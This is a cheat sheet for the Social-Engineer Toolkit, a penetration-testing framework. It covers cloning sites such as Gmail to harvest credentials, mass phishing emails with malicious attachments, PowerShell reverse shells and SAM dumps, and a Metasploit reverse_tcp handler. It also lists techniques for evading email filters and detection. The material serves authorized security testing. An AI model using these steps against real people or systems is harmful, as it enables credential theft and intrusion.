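# Social-Engineer Toolkit (SET) Cheat Sheet

The Social-Engineer Toolkit (SET) is an open-source penetration testing framework designed for social engineering attacks. Developed by David Kennedy (ReL1K) and the TrustedSec team, SET automates a range of social engineering attacks and provides a comprehensive platform for testing human vulnerabilities during security assessments.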
## Installation and Setup

### Installing on Kali Linux

```bash
# SET comes pre-installed on Kali Linux
setoolkit

# Update SET
cd /opt/set
git pull
```
### Manual Installation

```bash
# Clone repository
git clone https://github.com/trustedsec/social-engineer-toolkit/ set/
cd set/

# Install dependencies
pip3 install -r requirements.txt

# Run setup
python setup.py install

# Launch SET
python setoolkit
```
### Configuration

```bash
# Edit configuration file
nano /etc/setoolkit/set.config

# Key configuration options:
# WEBATTACK_EMAIL=ON
# APACHE_SERVER=ON
# METASPLOIT_PATH=/usr/share/metasploit-framework
# SENDMAIL=ON
# EMAIL_PROVIDER=GMAIL
```
## Main Menu Options

### 1) Social-Engineering Attacks

```bash
# Launch SET
setoolkit

# Select option 1 from main menu
# Social-Engineering Attacks submenu:
# 1) Spear-Phishing Attack Vectors
# 2) Website Attack Vectors
# 3) Infectious Media Generator
# 4) Create a Payload and Listener
# 5) Mass Mailer Attack
# 6) Arduino-Based Attack Vector
# 7) Wireless Access Point Attack Vector
# 8) QRCode Generator Attack Vector
# 9) Powershell Attack Vectors
# 10) Third Party Modules
```
### Spear-Phishing Attack Vectors

```bash
# Option 1 from Social-Engineering Attacks
# Spear-Phishing submenu:
# 1) Perform a Mass Email Attack
# 2) Create a FileFormat Payload
# 3) Create a Social-Engineering Template

# Mass Email Attack
# - Configure SMTP settings
# - Import email list
# - Create or select email template
# - Attach malicious payload

# FileFormat Payload
# - Select file format (PDF, DOC, XLS, etc.)
# - Choose exploit
# - Generate malicious file

# Email Templates
# - Pre-built templates for common scenarios
# - Custom template creation
# - HTML email support
```
### Website Attack Vectors

```bash
# Option 2 from Social-Engineering Attacks
# Website Attack submenu:
# 1) Java Applet Attack Method
# 2) Metasploit Browser Exploit Method
# 3) Credential Harvester Attack Method
# 4) Tabnabbing Attack Method
# 5) Web Jacking Attack Method
# 6) Multi-Attack Web Method
# 7) HTA Attack Method

# Credential Harvester
# - Clone legitimate websites
# - Capture credentials
# - Redirect after capture
# - Email harvested credentials

# Java Applet Attack
# - Self-signed Java applet
# - Social engineering prompt
# - Payload execution after acceptance

# Browser Exploit Method
# - Metasploit browser exploits
# - Automatic exploitation
# - Multiple exploit attempts
```
## Attack Scenarios

### Credential Harvesting

```bash
# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 2) Website Attack Vectors
# Select: 3) Credential Harvester Attack Method

# Harvester options:
# 1) Web Templates
# 2) Site Cloner
# 3) Custom Import

# Site Cloner example:
# Enter URL to clone: https://gmail.com
# SET will clone the site and host locally
# Captured credentials saved to /root/.set/reports/
```
### Phishing Email Campaign

```bash
# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 1) Spear-Phishing Attack Vectors
# Select: 1) Perform a Mass Email Attack

# Configuration steps:
# 1) Select attack vector (fileformat, etc.)
# 2) Configure payload
# 3) Setup email template
# 4) Configure SMTP settings
# 5) Import target email list
# 6) Send campaign

# Email list format (emails.txt):
# user1@company.com
# user2@company.com
# user3@company.com
```
### Infectious Media Generator

```bash
# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 3) Infectious Media Generator

# Media options:
# 1) File-Format Exploits
# 2) Standard Metasploit Executable

# File-Format Exploits:
# - PDF exploits
# - Microsoft Office exploits
# - Browser-based exploits

# Standard Executable:
# - Windows executable
# - Linux executable
# - Mac OSX executable
```
### PowerShell Attack Vectors

```bash
# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 9) Powershell Attack Vectors

# PowerShell options:
# 1) PowerShell Alphanumeric Shellcode Injector
# 2) PowerShell Reverse Shell
# 3) PowerShell Bind Shell
# 4) PowerShell Dump SAM Database

# Reverse Shell example:
# Enter IP address for reverse connection
# Enter port for reverse connection
# Generate PowerShell command
# Execute on target system
```
## Advanced Techniques

### Custom Payloads

```bash
# Create custom payload
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 4) Create a Payload and Listener

# Payload options:
# 1) Windows Shell Reverse_TCP
# 2) Windows Meterpreter Reverse_TCP
# 3) Windows Meterpreter Reverse_HTTP
# 4) Windows Meterpreter Reverse_HTTPS
# 5) Linux Shell Reverse_TCP

# Configuration:
# Set LHOST (attacker IP)
# Set LPORT (listening port)
# Generate payload
# Setup listener
```
### Multi-Attack Web Method

```bash
# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 2) Website Attack Vectors
# Select: 6) Multi-Attack Web Method

# Combines multiple attack vectors:
# - Java Applet Attack
# - Metasploit Browser Exploit
# - Credential Harvester
# - Tabnabbing
# - Web Jacking

# Increases success probability
# Automatic fallback methods
# Comprehensive attack coverage
```
### Arduino-Based Attacks

```bash
# Start SET
setoolkit

# Select: 1) Social-Engineering Attacks
# Select: 6) Arduino-Based Attack Vector

# Arduino attack types:
# 1) Powershell HTTP GET MSF Payload
# 2) WSCRIPT HTTP GET MSF Payload
# 3) Powershell HTTP POST MSF Payload
# 4) WSCRIPT HTTP POST MSF Payload
# 5) Download-Execute Powershell Attack
# 6) Download-Execute WSCRIPT Attack

# Generates Arduino sketch
# Physical access required
# Automated payload execution
# Bypasses software restrictions
```
## Integration with Metasploit

### Metasploit Integration Setup

```bash
# Configure Metasploit path in SET
nano /etc/setoolkit/set.config

# Set Metasploit path:
METASPLOIT_PATH=/usr/share/metasploit-framework

# Start Metasploit listener
msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST attacker_ip
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit -j
```
### Automatic Listener Setup

```bash
# SET can automatically setup Metasploit listeners
# When creating payloads, select:
# "Do you want to start the listener now? [y/n]:"
# Select 'y' for automatic listener setup

# SET will:
# 1) Generate appropriate payload
# 2) Start msfconsole
# 3) Configure handler
# 4) Start listener
```
## Reporting and Logging

### Credential Reports

```bash
# Harvested credentials location
ls /root/.set/reports/

# View captured credentials
cat /root/.set/reports/2024-01-01\ 12:00:00.txt

# Email reports (if configured)
# Automatic email notifications
# Real-time credential capture alerts
```
### Attack Logs

```bash
# SET log files
ls /root/.set/logs/

# View attack logs
tail -f /root/.set/logs/set_logfile.log

# Apache access logs (for web attacks)
tail -f /var/log/apache2/access.log

# Email logs
tail -f /var/log/mail.log
```
### Custom Reporting

```bash
# Generate custom reports
# Parse log files for specific information
grep "credential" /root/.set/logs/set_logfile.log

# Extract IP addresses
grep -oE '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' /root/.set/logs/set_logfile.log

# Count successful attacks
grep -c "successful" /root/.set/logs/set_logfile.log
```
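
The grep one-liners above, extended into a per-source summary for the engagement report. This is an added example, not part of the original cheat sheet or of SET; the function names are hypothetical and the log lines are constructed samples, since SET's real log layout may differ. Unlike the bare regex, it rejects dotted quads with octets above 255 and digit runs such as timestamps and version strings.

```bash
#!/usr/bin/env bash
# Added example: per-source summary of a log for the engagement report.
# The sample log lines are constructed; SET's real log layout may differ.

# Print each valid IPv4 address found in file $1, one per line.
extract_ipv4() {
    # Take maximal runs of digits and dots, then validate them in awk so that
    # timestamps, version strings and octets above 255 are rejected.
    grep -oE '[0-9.]+' "$1" | awk -F. '{
        gsub(/^[.]+|[.]+$/, "")      # trim sentence-ending or stray dots
        if (NF != 4) next
        for (i = 1; i <= 4; i++)
            if ($i == "" || length($i) > 3 || $i + 0 > 255) next
        print
    }'
}

# Print "count ip" for every unique source address, busiest first.
ip_summary() {
    extract_ipv4 "$1" | sort | uniq -c | awk '{print $1, $2}' |
        sort -k1,1nr -k2,2
}

# Count the lines of file $1 that contain keyword $2 (case-insensitive).
count_events() {
    grep -ci -- "$2" "$1"
}

# Write a constructed sample log to file $1.
make_sample_log() {
    cat > "$1" <<'EOF'
2024-01-01 12:00:01 GET /index.html from 192.0.2.10
2024-01-01 12:00:05 POST /login credential captured from 192.0.2.10 successful
2024-01-01 12:01:12 GET /index.html from 198.51.100.7
2024-01-01 12:02:30 version string 999.1.2.3000 ignored
2024-01-01 12:03:44 POST /login credential captured from 203.0.113.25 successful
EOF
}

# Demo: summarise the file given as $1, or the constructed sample if none.
demo_log="${1:-}"
if [ -z "$demo_log" ]; then
    demo_log=$(mktemp)
    make_sample_log "$demo_log"
fi
ip_summary "$demo_log"
echo "successful events: $(count_events "$demo_log" successful)"
```
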
## Evasion Techniques

### Email Evasion

```bash
# Domain reputation management
# Use legitimate email providers
# Gradual sending patterns
# Personalized content
# Email headers manipulation
# SPF/DKIM configuration
# Reply-to address spoofing
# Message threading
# Content evasion
# Image-based content
# URL shorteners
# Legitimate file hosting
```

```bash
# Domain fronting
# CDN utilization
# SSL/TLS encryption
# Legitimate hosting providers
# User-Agent rotation
# IP address rotation
# Traffic timing variation
# Legitimate referrer headers
# Content delivery
# Staged payloads
# Encrypted communications
# Legitimate file formats
```

### Payload Evasion
```bash
# Encoding techniques
# Encryption methods
# Packing/compression
# Code obfuscation
# Delivery methods
# Legitimate file formats
# Trusted applications
# Signed executables
# Execution techniques
# Living off the land
# PowerShell alternatives
# Memory-only execution
```

## Best Practices

### Legal and Ethical Considerations
```bash
# Always obtain proper authorization
# Document scope and limitations
# Follow responsible disclosure
# Maintain confidentiality
# Create engagement documentation
echo "Social Engineering Test Authorization" > authorization.txt
echo "Client: Company Name" >> authorization.txt
echo "Scope: Email addresses, domains" >> authorization.txt
echo "Date: $(date)" >> authorization.txt
echo "Tester: Your Name" >> authorization.txt
```

### Operational Security
```bash
# Use dedicated infrastructure
# Implement proper logging
# Secure communication channels
# Regular backup procedures
# Infrastructure isolation
# Separate testing networks
# Dedicated email accounts
# Isolated web servers
# Data protection
# Encrypted storage
# Secure transmission
# Proper disposal
```

### Testing Methodology
```bash
# Reconnaissance phase
# Target identification
# Information gathering
# Attack vector selection
# Execution phase
# Payload delivery
# Credential harvesting
# System compromise
# Post-exploitation
# Persistence establishment
# Data collection
# Evidence gathering
# Reporting phase
# Impact assessment
# Remediation recommendations
# Executive summary
```

## Troubleshooting

### Common Issues
```bash
# Email delivery problems
# Check SMTP configuration
# Verify DNS settings
# Test email connectivity
# Web server issues
# Check Apache configuration
# Verify port availability
# Test web connectivity
# Payload generation errors
# Verify Metasploit integration
# Check dependencies
# Update SET framework
# Permission issues
# Run as root user
# Check file permissions
# Verify directory access
```

### Configuration Fixes
```bash
# Reset SET configuration
rm /etc/setoolkit/set.config
setoolkit # Will recreate config
# Update SET framework
cd /opt/set
git pull
python setup.py install
# Fix Apache issues
sudo systemctl restart apache2
sudo systemctl enable apache2
# Fix email issues
sudo systemctl restart postfix
sudo systemctl enable postfix
```

## Resources

- [SET Official Documentation](https://github.com/trustedsec/social-engineer-toolkit)
- [TrustedSec Blog](https://www.trustedsec.com/blog/)
- [Social Engineering Framework](https://www.social-engineer.org/)
- [NIST Cybersecurity Framework](https://www.nist.gov/cyberframework)
- [SANS Social Engineering](https://www.sans.org/white-papers/social-engineering/)